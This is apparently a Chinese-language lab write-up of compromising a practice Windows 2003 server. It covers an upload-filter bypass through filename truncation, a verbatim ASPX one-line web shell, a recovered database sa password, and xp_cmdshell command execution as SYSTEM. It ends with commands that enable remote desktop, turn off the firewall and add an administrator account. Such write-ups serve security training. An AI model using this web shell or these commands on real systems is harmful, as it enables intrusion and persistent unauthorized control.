写在开始
这是一个有后台上传和mssql提权的一个靶机的Write Up
过程
首先用nmap扫一下这个机器
发现开了一个1433端口的mssql和27689端口的http服务器,首先登录这个http服务器看里面的情况。
发现是个文件上传下载系统,而且好像是个aspx的服务。
用dirsearch扫一下网站
发现有个web.config.bak文件,下载下来看看内容
拿到一个数据库用户名密码还有数据库名称用户名down,密码downsql,登录进去看看
有个key,拿一下
然后拿到用户名密码,登录后台可以得到另一个key
测试文件上传可以发现识别文件后缀和Content-Type,修改后可以上传,
并且文件名有32字符自动切割的方式,通过测试可得可以上传名为12345678.aspx.jpg的图片,并被自动切割成638266750305458046-12345678.aspx文件,接下来可以查看文件url,可以得到一个http://172.16.1.92:27689/admin/file_down.aspx?file=638266750305458046-12345678.aspx的下载链接。
删掉get请求后可以令其抛出异常
可以看到其trace中包含filepath相关的代码,可以看出路径在当前路径的../upfile/affix/也就是http://172.16.1.92:27689/upfile/affix/,手动拼接文件名和该路径可以得到文件的链接,以此方式上传蚁剑一句话木马
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>之后使用蚁剑连接,可以看到有一个web.config.bak.2017-12-12
打开后可以看到sa的密码:cisp-pte@sa
之后使用sa连接数据库后执行命令exec master..xp_cmdshell 'whoami';
可以看到是system权限
然后用这个博客的弹shell的方式弹一个shell回来就行了。
然而这是Win2003,没有PowerShell,所以直接建账户开3389进完事了。开3389的命令如下
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f关防火墙
netsh advfirewall set allprofiles state offWin2003关防火墙
net stop sharedaccess建账户并设置为管理员
net user username "password" /ADD
net localgroup Administrators username /ADD写在最后
意料之外的是这个系统太老了,居然连PowerShell都没有,就很尴尬.